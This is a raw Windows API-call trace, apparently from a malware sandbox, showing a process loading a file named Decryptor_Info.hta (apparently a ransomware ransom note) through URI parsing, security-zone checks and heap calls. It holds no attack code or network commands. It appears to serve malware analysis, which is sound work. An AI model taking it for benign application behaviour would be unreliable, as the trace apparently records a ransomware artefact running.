lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0109.671] GetParent (hWnd=0x150268) returned 0x0 [0109.671] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x14) returned 0x4735c0 [0109.671] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x46d178 [0109.671] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4735c0 | out: hHeap=0x450000) returned 1 [0109.673] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x48f8d8 [0109.673] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xe) returned 0x48ba20 [0109.673] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x94) returned 0x48f930 [0109.673] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x14) returned 0x4735c0 [0109.673] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x12) returned 0x4735e0 [0109.673] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x14) returned 0x473600 [0109.673] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xe) returned 0x48ba38 [0109.673] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x10) returned 0x48ba50 [0109.673] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xe) returned 0x48ba68 [0109.673] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x10) returned 0x48ba80 [0109.673] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c) returned 0x481d58 [0109.673] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1a) returned 0x481d80 [0109.674] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1a) returned 0x481da8 [0109.674] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x12) returned 0x473620 [0109.674] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x12) returned 0x473640 [0109.674] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x12) returned 0x473660 [0109.674] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x12) returned 0x473680 [0109.674] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x10) returned 0x48ba98 [0109.674] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc) returned 0x48bac8 [0109.674] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x10) returned 0x48bae0 [0109.674] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x12) returned 0x4736a0 [0109.674] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xe) returned 0x48baf8 [0109.675] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xa) returned 0x48bb10 [0109.675] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x26) returned 0x46d1a8 [0109.675] GetProcessHeap () returned 0x450000 [0109.675] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x481dd0 | out: hHeap=0x450000) returned 1 [0109.675] GetProcessHeap () returned 0x450000 [0109.675] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x481df8 | out: hHeap=0x450000) returned 1 [0109.675] GetProcessHeap () returned 0x450000 [0109.675] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x481e20 | out: hHeap=0x450000) returned 1 [0109.675] GetProcessHeap () returned 0x450000 [0109.675] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x47b448 | out: hHeap=0x450000) returned 1 [0109.675] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x48ba98 | out: hHeap=0x450000) returned 1 [0109.675] IMoniker:GetDisplayName (in: This=0x474038, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x22f5c0 | out: ppszDisplayName=0x22f5c0*="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta") returned 0x0 [0109.675] IUnknown:QueryInterface (in: This=0x474038, riid=0x73d072f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x22f598 | out: ppvObject=0x22f598*=0x474044) returned 0x0 [0109.675] IUriContainer:GetIUri (in: This=0x474044, ppIUri=0x22f5c8 | out: ppIUri=0x22f5c8*=0x47c264) returned 0x0 [0109.675] IUnknown:Release (This=0x474044) returned 0x1 [0109.675] IUnknown:AddRef (This=0x474038) returned 0x2 [0109.675] IUnknown:AddRef (This=0x47c264) returned 0x5 [0109.675] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.675] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.675] IMoniker:GetDisplayName (in: This=0x474038, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x22f4a0 | out: ppszDisplayName=0x22f4a0*="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta") returned 0x0 [0109.676] UrlGetLocationW (psz1="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta") returned 0x0 [0109.676] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", ppmk=0x22f46c*=0x0, dwFlags=0x1 | out: ppmk=0x22f46c*=0x48e710) returned 0x0 [0109.676] CreateUri (in: pwzURI="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x22f464 | out: ppURI=0x22f464*=0x47c5c4) returned 0x0 [0109.676] IUri:GetScheme (in: This=0x47c5c4, pdwScheme=0x22f3fc | out: pdwScheme=0x22f3fc*=0x9) returned 0x0 [0109.676] CoInternetIsFeatureEnabled (FeatureEntry=0x1, dwFlags=0x2) returned 0x1 [0109.677] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.677] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1c) returned 0x481e20 [0109.677] IUnknown:AddRef (This=0x47c5c4) returned 0x5 [0109.677] IUri:GetAbsoluteUri (in: This=0x47c5c4, pbstrAbsoluteUri=0x481e20 | out: pbstrAbsoluteUri=0x481e20*="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta") returned 0x0 [0109.677] IUnknown:Release (This=0x47c5c4) returned 0x4 [0109.677] IUnknown:AddRef (This=0x48e710) returned 0x2 [0109.677] IUnknown:Release (This=0x48e710) returned 0x1 [0109.677] IUnknown:AddRef (This=0x474038) returned 0x3 [0109.677] IUnknown:Release (This=0x48e710) returned 0x0 [0109.677] IUnknown:AddRef (This=0x474038) returned 0x4 [0109.677] IUnknown:QueryInterface (in: This=0x47c264, riid=0x73d8d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x22f26c | out: ppvObject=0x22f26c*=0x47c264) returned 0x0 [0109.677] IUnknown:Release (This=0x47c264) returned 0x5 [0109.677] IUnknown:AddRef (This=0x47c264) returned 0x6 [0109.677] IUnknown:QueryInterface (in: This=0x474038, riid=0x73d072f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x22f240 | out: ppvObject=0x22f240*=0x474044) returned 0x0 [0109.677] IUriContainer:GetIUri (in: This=0x474044, ppIUri=0x22f294 | out: ppIUri=0x22f294*=0x47c264) returned 0x0 [0109.677] IUnknown:Release (This=0x474044) returned 0x4 [0109.677] IUnknown:AddRef (This=0x474038) returned 0x5 [0109.677] IUnknown:Release (This=0x474038) returned 0x4 [0109.677] IUnknown:AddRef (This=0x47c264) returned 0x8 [0109.677] IUnknown:QueryInterface (in: This=0x47c264, riid=0x73d8d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x22f26c | out: ppvObject=0x22f26c*=0x47c264) returned 0x0 [0109.677] IUnknown:Release (This=0x47c264) returned 0x8 [0109.677] IUnknown:AddRef (This=0x47c264) returned 0x9 [0109.677] IUri:GetScheme (in: This=0x47c264, pdwScheme=0x22f264 | out: pdwScheme=0x22f264*=0x9) returned 0x0 [0109.677] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xc8) returned 0x48fee0 [0109.678] GetCurrentProcessId () returned 0xe98 [0109.678] IUnknown:QueryInterface (in: This=0x47c264, riid=0x73d8d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x22f26c | out: ppvObject=0x22f26c*=0x47c264) returned 0x0 [0109.678] IUnknown:Release (This=0x47c264) returned 0x9 [0109.678] IUnknown:AddRef (This=0x47c264) returned 0xa [0109.678] IUri:GetScheme (in: This=0x47c264, pdwScheme=0x22f23c | out: pdwScheme=0x22f23c*=0x9) returned 0x0 [0109.678] IUnknown:QueryInterface (in: This=0x47c264, riid=0x73d8d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x22f1f0 | out: ppvObject=0x22f1f0*=0x47c264) returned 0x0 [0109.678] IUnknown:Release (This=0x47c264) returned 0xa [0109.678] IUnknown:AddRef (This=0x47c264) returned 0xb [0109.678] IUnknown:Release (This=0x47c264) returned 0xa [0109.678] IUri:GetAbsoluteUri (in: This=0x47c264, pbstrAbsoluteUri=0x22f26c | out: pbstrAbsoluteUri=0x22f26c*="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta") returned 0x0 [0109.678] GetProcAddress (hModule=0x76e40000, lpProcName=0x7) returned 0x76e44680 [0109.678] SysStringLen (param_1="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta") returned 0x4a [0109.678] CreateUri (in: pwzURI="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x22f288 | out: ppURI=0x22f288*=0x47c774) returned 0x0 [0109.678] IUnknown:Release (This=0x47c264) returned 0x9 [0109.678] IUri:GetScheme (in: This=0x47c774, pdwScheme=0x22f21c | out: pdwScheme=0x22f21c*=0x9) returned 0x0 [0109.678] IUri:IsEqual (in: This=0x47c5c4, pUri=0x47c774, pfEqual=0x22f264 | out: pfEqual=0x22f264*=1) returned 0x0 [0109.678] IUnknown:AddRef (This=0x47c5c4) returned 0x3 [0109.678] IUri:GetPropertyDWORD (in: This=0x47c5c4, uriProp=0x11, pdwProperty=0x22effc, dwFlags=0x0 | out: pdwProperty=0x22effc*=0x9) returned 0x0 [0109.679] IUnknown:Release (This=0x47c5c4) returned 0x2 [0109.680] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x9a) returned 0x490380 [0109.680] IInternetSecurityManager:GetSecurityId (in: This=0x484280, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", pbSecurityId=0x22f060, pcbSecurityId=0x22f05c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x22f060*=0x66, pcbSecurityId=0x22f05c*=0x9) returned 0x0 [0109.680] IInternetSecurityManager:GetSecurityId (in: This=0x741096bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", pbSecurityId=0x22f060, pcbSecurityId=0x22f05c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x22f060*=0x0, pcbSecurityId=0x22f05c*=0x200) returned 0x800c0011 [0109.691] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x490380 | out: hHeap=0x450000) returned 1 [0109.691] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x47b748 | out: hHeap=0x450000) returned 1 [0109.691] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x9) returned 0x47b748 [0109.691] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x47b7a8 | out: hHeap=0x450000) returned 1 [0109.691] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x9) returned 0x47b7a8 [0109.691] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", ppu=0x22f218 | out: ppu=0x22f218) returned 0x0 [0109.691] GetDC (hWnd=0x0) returned 0x6010a73 [0109.691] CreateCompatibleBitmap (hdc=0x6010a73, cx=1, cy=1) returned 0x9050a78 [0109.691] GetDIBits (in: hdc=0x6010a73, hbm=0x9050a78, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x22ede8, usage=0x0 | out: lpvBits=0x0, lpbmi=0x22ede8) returned 1 [0109.691] GetDIBits (in: hdc=0x6010a73, hbm=0x9050a78, start=0x0, cLines=0x1, lpvBits=0x0, lpbmi=0x22ede8, usage=0x0 | out: lpvBits=0x0, lpbmi=0x22ede8) returned 1 [0109.692] DeleteObject (ho=0x9050a78) returned 1 [0109.692] GetSysColor (nIndex=0) returned 0xc8c8c8 [0109.692] GetSysColor (nIndex=1) returned 0x0 [0109.692] GetSysColor (nIndex=2) returned 0xd1b499 [0109.692] GetSysColor (nIndex=3) returned 0xdbcdbf [0109.692] GetSysColor (nIndex=4) returned 0xf0f0f0 [0109.692] GetSysColor (nIndex=5) returned 0xffffff [0109.692] GetSysColor (nIndex=6) returned 0x646464 [0109.692] GetSysColor (nIndex=7) returned 0x0 [0109.692] GetSysColor (nIndex=8) returned 0x0 [0109.692] GetSysColor (nIndex=9) returned 0x0 [0109.692] GetSysColor (nIndex=10) returned 0xb4b4b4 [0109.692] GetSysColor (nIndex=11) returned 0xfcf7f4 [0109.692] GetSysColor (nIndex=12) returned 0xababab [0109.692] GetSysColor (nIndex=13) returned 0xff9933 [0109.692] GetSysColor (nIndex=14) returned 0xffffff [0109.692] GetSysColor (nIndex=15) returned 0xf0f0f0 [0109.692] GetSysColor (nIndex=16) returned 0xa0a0a0 [0109.692] GetSysColor (nIndex=17) returned 0x6d6d6d [0109.692] GetSysColor (nIndex=18) returned 0x0 [0109.692] GetSysColor (nIndex=19) returned 0x544e43 [0109.692] GetSysColor (nIndex=20) returned 0xffffff [0109.692] GetSysColor (nIndex=21) returned 0x696969 [0109.692] GetSysColor (nIndex=22) returned 0xe3e3e3 [0109.692] GetSysColor (nIndex=23) returned 0x0 [0109.692] GetSysColor (nIndex=24) returned 0xe1ffff [0109.692] GetSysColor (nIndex=25) returned 0x0 [0109.692] GetSysColor (nIndex=26) returned 0xcc6600 [0109.692] GetSysColor (nIndex=27) returned 0xead1b9 [0109.692] GetSysColor (nIndex=28) returned 0xf2e4d7 [0109.692] GetSysColor (nIndex=29) returned 0xff9933 [0109.692] GetSysColor (nIndex=30) returned 0xf0f0f0 [0109.692] GetSysColor (nIndex=31) returned 0x0 [0109.692] GetSysColor (nIndex=32) returned 0x0 [0109.692] GetSysColor (nIndex=33) returned 0x0 [0109.692] GetSysColor (nIndex=34) returned 0x0 [0109.692] GetSysColor (nIndex=35) returned 0x0 [0109.692] GetSysColor (nIndex=36) returned 0x0 [0109.693] GetSysColor (nIndex=37) returned 0x0 [0109.693] GetSysColor (nIndex=38) returned 0x0 [0109.693] GetSysColor (nIndex=39) returned 0x0 [0109.693] GetSysColor (nIndex=40) returned 0x0 [0109.693] GetSysColor (nIndex=41) returned 0x0 [0109.693] GetSysColor (nIndex=42) returned 0x0 [0109.693] GetSysColor (nIndex=43) returned 0x0 [0109.693] GetSysColor (nIndex=44) returned 0x0 [0109.693] GetSysColor (nIndex=45) returned 0x0 [0109.693] GetSysColor (nIndex=46) returned 0x0 [0109.693] GetSysColor (nIndex=47) returned 0x0 [0109.693] GetSysColor (nIndex=48) returned 0x0 [0109.693] GetSysColor (nIndex=49) returned 0x0 [0109.693] GetSysColor (nIndex=50) returned 0x0 [0109.693] GetSysColor (nIndex=51) returned 0x0 [0109.693] GetSysColor (nIndex=52) returned 0x0 [0109.693] GetSysColor (nIndex=53) returned 0x0 [0109.693] GetSysColor (nIndex=54) returned 0x0 [0109.693] GetSysColor (nIndex=55) returned 0x0 [0109.693] GetSysColor (nIndex=56) returned 0x0 [0109.693] GetSysColor (nIndex=57) returned 0x0 [0109.693] GetSysColor (nIndex=58) returned 0x0 [0109.693] GetSysColor (nIndex=59) returned 0x0 [0109.693] GetSysColor (nIndex=60) returned 0x0 [0109.693] GetSysColor (nIndex=61) returned 0x0 [0109.693] GetSysColor (nIndex=62) returned 0x0 [0109.693] GetSysColor (nIndex=63) returned 0x0 [0109.693] GetDeviceCaps (hdc=0x6010a73, index=38) returned 32409 [0109.693] ReleaseDC (hWnd=0x0, hDC=0x6010a73) returned 1 [0109.693] GetCurrentThreadId () returned 0xe9c [0109.693] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x48bc60 [0109.694] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x50) returned 0x490440 [0109.694] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x30) returned 0x46d850 [0109.694] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x492080 [0109.695] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0109.695] GetCurrentThreadId () returned 0xe9c [0109.695] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x46d850 | out: hHeap=0x450000) returned 1 [0109.695] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x9a) returned 0x490380 [0109.695] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", ppu=0x22f208 | out: ppu=0x22f208) returned 0x0 [0109.695] CreateUri (in: pwzURI="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x22f1ec | out: ppURI=0x22f1ec*=0x47c5c4) returned 0x0 [0109.695] IUnknown:AddRef (This=0x47c5c4) returned 0x5 [0109.695] IInternetSecurityManager:MapUrlToZone (in: This=0x741096bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", pdwZone=0x22f18c, dwFlags=0x0 | out: pdwZone=0x22f18c*=0xffffffff) returned 0x800c0011 [0109.697] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0109.697] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0109.697] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0109.697] IInternetSecurityManager:ProcessUrlAction (in: This=0x741096bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", dwAction=0x2700, pPolicy=0x22f190, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x22f190*=0x0) returned 0x0 [0109.697] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0109.697] IUnknown:Release (This=0x47c5c4) returned 0x4 [0109.697] IUnknown:Release (This=0x47c5c4) returned 0x3 [0109.697] IUnknown:AddRef (This=0x47c5c4) returned 0x4 [0109.697] IUri:GetPropertyDWORD (in: This=0x47c5c4, uriProp=0x11, pdwProperty=0x22efc4, dwFlags=0x0 | out: pdwProperty=0x22efc4*=0x9) returned 0x0 [0109.697] IUnknown:Release (This=0x47c5c4) returned 0x3 [0109.697] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x9a) returned 0x492ae0 [0109.697] IInternetSecurityManager:GetSecurityId (in: This=0x484280, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", pbSecurityId=0x22f020, pcbSecurityId=0x22f01c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x22f020*=0x66, pcbSecurityId=0x22f01c*=0x9) returned 0x0 [0109.697] IInternetSecurityManager:GetSecurityId (in: This=0x741096bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", pbSecurityId=0x22f020, pcbSecurityId=0x22f01c*=0x200, dwReserved=0x0 | out: pbSecurityId=0x22f020*=0x0, pcbSecurityId=0x22f01c*=0x200) returned 0x800c0011 [0109.697] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x492ae0 | out: hHeap=0x450000) returned 1 [0109.697] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.697] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x9) returned 0x48bc78 [0109.698] CoInternetGetSession (in: dwSessionMode=0x0, ppIInternetSession=0x22f244, dwReserved=0x0 | out: ppIInternetSession=0x22f244*=0x488270) returned 0x0 [0109.698] IInternetSession:RegisterNameSpace (This=0x488270, pCF=0x74108c50, rclsid=0x73d09790, pwzProtocol="res", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0109.698] IUnknown:AddRef (This=0x74108c50) returned 0x1 [0109.698] IInternetSession:RegisterNameSpace (This=0x488270, pCF=0x74108c70, rclsid=0x73d09780, pwzProtocol="about", cPatterns=0x0, ppwzPatterns=0x0, dwReserved=0x0) returned 0x0 [0109.698] IUnknown:AddRef (This=0x74108c70) returned 0x1 [0109.699] StrCmpICW (pszStr1="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/AppData/Roaming/Decryptor_Info.hta", pszStr2="res://ieframe.dll/PhishSite.htm") returned -12 [0109.699] IUnknown:QueryInterface (in: This=0x47c264, riid=0x73d8d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x22f1b4 | out: ppvObject=0x22f1b4*=0x47c264) returned 0x0 [0109.699] IUnknown:Release (This=0x47c264) returned 0x9 [0109.699] IUnknown:AddRef (This=0x47c264) returned 0xa [0109.699] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x12c) returned 0x492ae0 [0109.699] IUnknown:AddRef (This=0x47c264) returned 0xb [0109.699] IUnknown:QueryInterface (in: This=0x47c264, riid=0x73d8d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x22f178 | out: ppvObject=0x22f178*=0x47c264) returned 0x0 [0109.699] IUnknown:Release (This=0x47c264) returned 0xb [0109.699] IUnknown:AddRef (This=0x47c264) returned 0xc [0109.699] IUnknown:Release (This=0x47c264) returned 0xb [0109.699] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x3c) returned 0x464258 [0109.700] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xb4) returned 0x492c18 [0109.700] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x30) returned 0x46d850 [0109.700] IUri:GetScheme (in: This=0x47c264, pdwScheme=0x22f1fc | out: pdwScheme=0x22f1fc*=0x9) returned 0x0 [0109.700] IUri:IsEqual (in: This=0x47c5c4, pUri=0x47c264, pfEqual=0x22f244 | out: pfEqual=0x22f244*=1) returned 0x0 [0109.700] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.700] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x490498 [0109.700] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x12) returned 0x473760 [0109.700] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x60) returned 0x492cd8 [0109.700] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x30) returned 0x46d888 [0109.700] PostMessageW (hWnd=0x30204, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0109.700] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x12c) returned 0x492d40 [0109.700] IUnknown:AddRef (This=0x47c264) returned 0xc [0109.701] IUnknown:QueryInterface (in: This=0x47c264, riid=0x73d8d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x22f198 | out: ppvObject=0x22f198*=0x47c264) returned 0x0 [0109.701] IUnknown:Release (This=0x47c264) returned 0xc [0109.701] IUnknown:AddRef (This=0x47c264) returned 0xd [0109.701] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x4c) returned 0x4904f0 [0109.701] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x68) returned 0x4932c8 [0109.701] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x108) returned 0x493338 [0109.701] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x492ee0 [0109.701] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0xcc) returned 0x47cc78 [0109.701] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x492ef8 [0109.701] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x30) returned 0x46d8c0 [0109.701] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x8, Size=0x1b0) returned 0x493448 [0109.701] IUnknown:QueryInterface (in: This=0x47c264, riid=0x73d8d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x22ee9c | out: ppvObject=0x22ee9c*=0x47c264) returned 0x0 [0109.701] IUnknown:Release (This=0x47c264) returned 0xd [0109.701] IUnknown:AddRef (This=0x47c264) returned 0xe [0109.701] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0109.701] IUnknown:AddRef (This=0x47c264) returned 0xf [0109.701] IUnknown:AddRef (This=0x47c264) returned 0x10 [0109.701] IUnknown:QueryInterface (in: This=0x47c264, riid=0x73d8d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x22ee90 | out: ppvObject=0x22ee90*=0x47c264) returned 0x0 [0109.702] IUnknown:Release (This=0x47c264) returned 0x10 [0109.702] IUnknown:AddRef (This=0x47c264) returned 0x11 [0109.702] IUri:GetScheme (in: This=0x47c264, pdwScheme=0x493550 | out: pdwScheme=0x493550*=0x9) returned 0x0 [0109.702] IMoniker:IsSystemMoniker (in: This=0x474038, pdwMksys=0x22eef8 | out: pdwMksys=0x22eef8*=0x6) returned 0x0 [0109.702] CoInternetParseIUri (in: pIUri=0x47c264, ParseAction=0x9, dwFlags=0x0, pwzResult=0x22ef08, cchResult=0x104, pcchResult=0x22eeac, dwReserved=0x0 | out: pwzResult="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decryptor_Info.hta", pcchResult=0x22eeac) returned 0x0 [0109.702] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x86) returned 0x493600 [0109.702] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decryptor_Info.hta", lpFindFileData=0x22ec38 | out: lpFindFileData=0x22ec38*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2c234c20, ftCreationTime.dwHighDateTime=0x1d62227, ftLastAccessTime.dwLowDateTime=0x2c234c20, ftLastAccessTime.dwHighDateTime=0x1d62227, ftLastWriteTime.dwLowDateTime=0x2c234c20, ftLastWriteTime.dwHighDateTime=0x1d62227, nFileSizeHigh=0x0, nFileSizeLow=0xd08, dwReserved0=0x5c007a, dwReserved1=0x700041, cFileName="Decryptor_Info.hta", cAlternateFileName="DECRYP~1.HTA")) returned 0x48e750 [0109.702] FindClose (in: hFindFile=0x48e750 | out: hFindFile=0x48e750) returned 1 